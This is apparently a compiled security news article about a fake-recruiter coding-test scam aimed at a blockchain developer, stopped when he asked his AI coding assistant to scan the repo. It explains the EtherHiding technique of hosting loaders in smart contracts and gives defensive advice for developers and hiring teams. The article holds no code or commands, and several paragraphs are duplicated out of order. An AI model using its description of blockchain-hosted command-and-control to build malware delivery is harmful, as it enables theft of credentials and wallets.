A single, almost‑throwaway prompt to an AI coding assistant appears to have stopped a full compromise in its tracks — and the episode should be a wake‑up call for developers, hiring teams, and security pros about how social engineering has evolved into a high‑precision, blockchain‑backed attack vector that targets the very people who build and secure our systems. The incident, described this week in investigative reporting and corroborated by multiple threat researchers, shows how a convincing fake recruiter and a seemingly normal coding test can deliver multi‑stage malware designed to steal credentials, seed phrases, and long‑term access — and how a simple “read this for suspicious patterns” prompt to a code assistant prevented a catastrophic mistake.
The broader pattern here is already familiar to infosec teams: sophisticated social engineering campaigns target narrow, high‑value populations — notably software developers working in blockchain and cryptocurrency — because their machines often hold the keys to critical systems, wallets, and cloud credentials. In the case under discussion, the campaign used fake LinkedIn profiles, professional scheduling (Calendly), and a realistic Bitbucket repo to bait a developer into downloading and running a “test” project that contained malicious code. The developer, David Dodda, reported that he was about 30 seconds away from executing the repo when he asked his Cursor coding assistant to scan the codebase for suspicious behavior — the assistant flagged problematic patterns and the execution was stopped.
This “Contagious Interview” tradecraft has been tracked by security researchers and folded into more advanced infrastructure: the same actor cluster that has used fake job interviews and developer lures is now leveraging EtherHiding — storing JavaScript loader code in smart contracts on public blockchains so payloads can be fetched in a way that avoids takedowns and traditional web‑based detection. That evolution converts the immutable, decentralized properties of blockchains from a marketing advantage into a resilient command‑and‑control (C2) mechanism for malware distribution. Google’s Threat Intelligence analysts first documented this shift and researchers have corroborated the activity in independent writeups.
Why that worked:
The lessons are concrete: provide secure test environments for candidates, reduce the appeal of local code execution, instrument developer endpoints for anomalous behavior, and add immediate triage steps (both human and automated) before any code is executed. Simple prompts to an AI assistant can help triage risk — but only when combined with strong process controls and the discipline to avoid running unvetted artifacts on productive machines.
For Windows administrators and IT managers, the immediate takeaways are operational: treat developer devices like servers in threat modeling; require sandboxed assessments; apply EDR policy that includes developer behaviors; and educate recruiters and hiring managers about the risks inherent in unstructured, downloadable test workflows. The adversary is using the tools and platforms developers like best; it’s time to make the developer experience secure by default, not secure by luck.
(Additional context and hiring/AI workflow discussion can be found in internal hiring‑tech threads and best‑practice guidance for AI usage in recruitment and interview design. See internal guidance summaries for pragmatic implementation steps.)
Source: theregister.com A simple AI prompt saved a developer from this scam
Background / Overview
The broader pattern here is already familiar to infosec teams: sophisticated social engineering campaigns target narrow, high‑value populations — notably software developers working in blockchain and cryptocurrency — because their machines often hold the keys to critical systems, wallets, and cloud credentials. In the case under discussion, the campaign used fake LinkedIn profiles, professional scheduling (Calendly), and a realistic Bitbucket repo to bait a developer into downloading and running a “test” project that contained malicious code. The developer, David Dodda, reported that he was about 30 seconds away from executing the repo when he asked his Cursor coding assistant to scan the codebase for suspicious behavior — the assistant flagged problematic patterns and the execution was stopped. This “Contagious Interview” tradecraft has been tracked by security researchers and folded into more advanced infrastructure: the same actor cluster that has used fake job interviews and developer lures is now leveraging EtherHiding — storing JavaScript loader code in smart contracts on public blockchains so payloads can be fetched in a way that avoids takedowns and traditional web‑based detection. That evolution converts the immutable, decentralized properties of blockchains from a marketing advantage into a resilient command‑and‑control (C2) mechanism for malware distribution. Google’s Threat Intelligence analysts first documented this shift and researchers have corroborated the activity in independent writeups.
How the scam in this case worked
The recruitment bait and the test repo
- The attacker masqueraded as a high‑level executive from a legitimate company, recreating a convincing LinkedIn profile and outreach messages. The fake recruiter scheduled an interview, then insisted on a coding assessment — a standard hiring practice weaponized. The test repository looked professional: README, documentation, and even corporate‑style stock imagery. All of these signals lowered suspicion and created the impression of a legitimate hiring process.
- The repo contained a multi‑stage payload pattern: innocent‑looking code that, when executed or inspected insufficiently, would fetch and execute further artifacts. In modern attack chains aimed at developers, the initial payload is often a small loader (JavaScript or native) that performs an “in‑memory” download of a more powerful backdoor or credential stealer — minimizing disk artifacts and evading casual inspection.
Why developers are the ideal target
- Developers’ workstations are high‑value targets: stored SSH keys, cloud access tokens, browser‑saved credentials, local crypto wallets, and privileged CI/CD agents all present a treasure trove to attackers. A single compromised dev machine can yield lateral access to source control, build systems, and production secrets.
- The social engineering lever — an exciting job opportunity or high‑paying freelance gig — is effective because it preys on normal developer behaviors: opening unfamiliar repos, running tests locally to check performance or completeness, and trusting code that appears to come from a legitimate corporate source.
EtherHiding: blockchain C2 and why it matters
How EtherHiding works (short technical explainer)
Attackers embed malicious data (JavaScript blobs, encoded payloads, or pointers to payloads) in smart contract storage on public blockchains (Ethereum, BNB Smart Chain). A loader executed on the victim machine performs a read‑only blockchain call (for example, an eth_call) to fetch that on‑chain data; because the read is off‑chain and stateless it doesn’t create a transaction or leave the same traceability that traditional C2 infrastructure would. The immutable nature of the blockchain means defenders cannot simply take down a hosting server or remove the payload from the contract — the hosted data remains available and difficult to purge. Researchers observed the technique being used to deliver loaders and backdoors in campaigns that first surfaced this year.Practical consequences
- Resilience to takedown: smart contract data is effectively permanent; defenders cannot delete a contract they don’t control.
- Low operational cost for attackers: updating on‑chain storage or deploying a new contract costs cents to a few dollars in gas, enabling rapid reconfiguration of payloads.
- Stealth: read‑only calls leave limited on‑chain footprints and can blend with normal client node activity, complicating detection.
- Cross‑platform reach: the loader can be a platform‑specific component (Windows, macOS, Linux) that interprets the on‑chain payload and executes further actions in memory, enabling the same on‑chain infrastructure to control diverse endpoints.
The AI prompt that stopped it — what happened and why it worked
The developer in this account was preparing to run the sample project with only minutes to spare before an interview. Instead of sandboxing the code — or because they were pressed for time — they began to examine and tidy the code manually. Before executing the code, the developer asked their Cursor AI assistant: “Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn't be reading, accessing crypto wallets etc.” That single request caused the assistant to highlight suspicious patterns and prevented an execution that would likely have led to credential and wallet theft. The developer credited that simple, pragmatic prompt with averting a disaster.Why that worked:
- Pattern recognition at scale: modern coding assistants can quickly flag unusual API calls, suspicious network access, or code that reads filesystem locations where keys and wallets are typically stored.
- Speed and simplicity: a quick automated review can surface red flags far faster than ad hoc human inspection, especially under time pressure.
- Reduced cognitive overhead: facing a convincing repo and a ticking clock, even experienced devs can make mistakes; an automated “safety check” provides an immediate second opinion.
Practical, repeatable advice for developers and hiring teams
For developers: immediate tactical checks (what to do before running unknown code)
- Sandbox first: use an ephemeral virtual machine, container, or dedicated isolated environment with no access to your host’s secrets. Always treat external code as untrusted.
- Protect secrets: remove or lock access to SSH keys, cloud credentials, and wallet files before testing. Use different users or accounts with minimal privileges.
- Use static analysis: run automated linters, dependency scanners (SCA), and malware scanners that can detect suspicious packages and known bad indicators.
- Ask an assistant (responsibly): use a coding assistant prompt similar to the one in this case to perform a quick triage, for example:
- “Scan this repo and list any suspicious behaviors: filesystem reads to typical key/wallet locations, unexpected network calls, eval or dynamic code execution, or use of obfuscated code.”
- “Flag any third‑party dependencies that are not on known registries or that are recently published with few downloads.”
- Inspect third‑party dependencies: check package maintainers, recent release activity, and whether the package is used widely. Avoid running unknown npm modules or binary installers locally without additional scrutiny.
For hiring and recruiting teams: change the process to remove the attack surface
- Replace downloadable “take‑home” tests with:
- In‑browser editors that run in a sandboxed environment, or
- Live coding assessments behind authenticated platforms that use ephemeral instances and limit artifact download.
- Vet external recruiters and sourcing channels. Encourage candidates to confirm recruiter identities via corporate channels and avoid off‑platform scheduling where possible.
- Standardize secure assessment tooling: provide candidates with pre‑configured VMs or cloud sandboxes if they must test code locally.
- Train hiring staff to recognize red flags in candidate outreach pipelines and implement a verification workflow for recruiter profiles that appear out of band.
For security teams: platform and policy controls
- Block or restrict RPC endpoints that can be abused for eth_call downloads unless strictly needed in dev workflows; enforce node whitelisting and policy-based access controls.
- Apply endpoint detection and response (EDR) controls that watch for in‑memory shells, unusual child processes, and suspicious network flows to block the dynamic stages of multi‑stage loaders.
- Increase telemetry from developer workstations: log file‑read patterns, npm installs, and new binary execution, and correlate with scheduled interviews or unusual external recruiters.
- Foster a culture where developers can refuse to run unvetted code without career penalty.
Cross‑checking the wider threat landscape (contemporaneous campaigns)
This episode sits among multiple active campaigns and vulnerabilities that together paint a worrying picture of diversified adversary capability and opportunism.- EtherHiding and UNC5342: Google Threat Intelligence documented EtherHiding and tied it to Contagious Interview campaigns; multiple reporting outlets corroborated those findings and described JADESNOW and INVISIBLEFERRET loaders and backdoors used to steal crypto and credentials. This corroboration comes from independent technical writeups and mainstream reporting.
- Cisco SNMP zero‑day (CVE‑2025‑20352) and “Operation ZeroDisco”: researchers at Trend Micro and multiple security outlets reported that attackers exploited a Cisco SNMP stack‑overflow vulnerability to deploy Linux rootkits on legacy switches. The operation installs persistent hooks into IOSd, sets a universal backdoor password (noted to include the word “disco”), and uses fileless components to evade detection. This shows that attackers are simultaneously refining infrastructure persistence and endpoint staging techniques.
- Fraudulently signed binaries and Rhysida: Microsoft reported that the financially motivated group tracked as Vanilla Tempest used fraudulently signed fake Microsoft Teams installers to deliver an Oyster backdoor and ultimately Rhysida ransomware. Microsoft revoked more than 200 certificates in a takedown action, demonstrating that adversaries combine social engineering, SEO poisoning, and supply‑chain trust to slip past defenses.
- SIMCARTEL disruption: European law enforcement dismantled an illegal SIM‑box service (operation SIMCARTEL) that facilitated large volumes of fraud and enabled criminals to create thousands of fake online identities. Authorities seized 1,200 SIM‑box devices and 40,000 active SIM cards, and attributed millions in losses to the operation — a reminder that telephony infrastructure and identity controls remain critical in the fraud ecosystem.
Critical analysis — strengths and weaknesses of the response shown, and systemic risks
What was done well in this case
- Quick thinking and defense‑in‑depth mindset: the developer asked for a quick automated second opinion and acted on suspicious findings instead of pressing “run” under time pressure.
- Use of an automated assistant as a triage tool — not an oracle — which reduced time to detection and complemented manual inspection.
- Public disclosure by the victim helps raise awareness and supplies practical indicators for defenders and hiring teams to update their playbooks.
Limitations and potential failure modes
- Over‑reliance on AI assistants is dangerous if the assistant is untrusted, offline, or itself compromised. Assistants may miss novel obfuscation patterns or misinterpret dynamic code; they are a helpful triage, not a guarantee.
- Many teams lack secure assessment infrastructure. If take‑home tests remain downloadable by candidates, organizations will continue to provide an attack surface.
- The move to on‑chain C2 (EtherHiding) and fileless rootkits (ZeroDisco) increases forensic difficulty. Traditional takedown measures (server seizures, domain blacklisting) are less effective when payloads and control channels are decentralized or memory‑resident.
- Detection gaps on developer endpoints are systemic: EDR may not cover personal developer machines, and corporate developer devices often blur the line between personal and corporate assets, complicating telemetry and response.
Policy and governance implications
- Hiring platforms and social networks need better controls to detect and remove convincingly fake profiles used in these scams; this requires coordinated identity verification improvements and faster takedown workflows.
- Organizations should codify secure interviewing practices and provide candidates with secure, disposable testing environments to prevent off‑site execution of unverified code.
A practical checklist to reduce the odds of falling for a similar scam
- Never run unknown code on a machine that stores keys, credentials, or wallets.
- Insist hiring teams provide a sandboxed environment (cloud or VM) for any required take‑home tests.
- Use static analysis, SCA tools, and dependency heuristics before executing code.
- Rotate and minimize privileges: store keys in hardware wallets or dedicated key management systems; avoid local storage of production credentials.
- Maintain a forensic and incident response plan that accounts for novel C2 like blockchain reads and for fileless persistence patterns.
Closing assessment
This near‑miss is both instructive and alarming. It demonstrates that simple human judgement coupled with lightweight automation — in this case, a carefully framed assistant prompt — can stop a tailored attack in its tracks. But it also underlines a broader reality: attackers are evolving rapidly, combining social engineering, decentralized hosting (smart contracts), and traditional exploitation to create resilient supply chains for malware. Defenders must respond accordingly by hardening developer workflows, improving interview and hiring processes, deploying layered endpoint protections, and treating developer workstations as high‑value assets rather than interchangeable laptops.The lessons are concrete: provide secure test environments for candidates, reduce the appeal of local code execution, instrument developer endpoints for anomalous behavior, and add immediate triage steps (both human and automated) before any code is executed. Simple prompts to an AI assistant can help triage risk — but only when combined with strong process controls and the discipline to avoid running unvetted artifacts on productive machines.
For Windows administrators and IT managers, the immediate takeaways are operational: treat developer devices like servers in threat modeling; require sandboxed assessments; apply EDR policy that includes developer behaviors; and educate recruiters and hiring managers about the risks inherent in unstructured, downloadable test workflows. The adversary is using the tools and platforms developers like best; it’s time to make the developer experience secure by default, not secure by luck.
(Additional context and hiring/AI workflow discussion can be found in internal hiring‑tech threads and best‑practice guidance for AI usage in recruitment and interview design. See internal guidance summaries for pragmatic implementation steps.)
Source: theregister.com A simple AI prompt saved a developer from this scam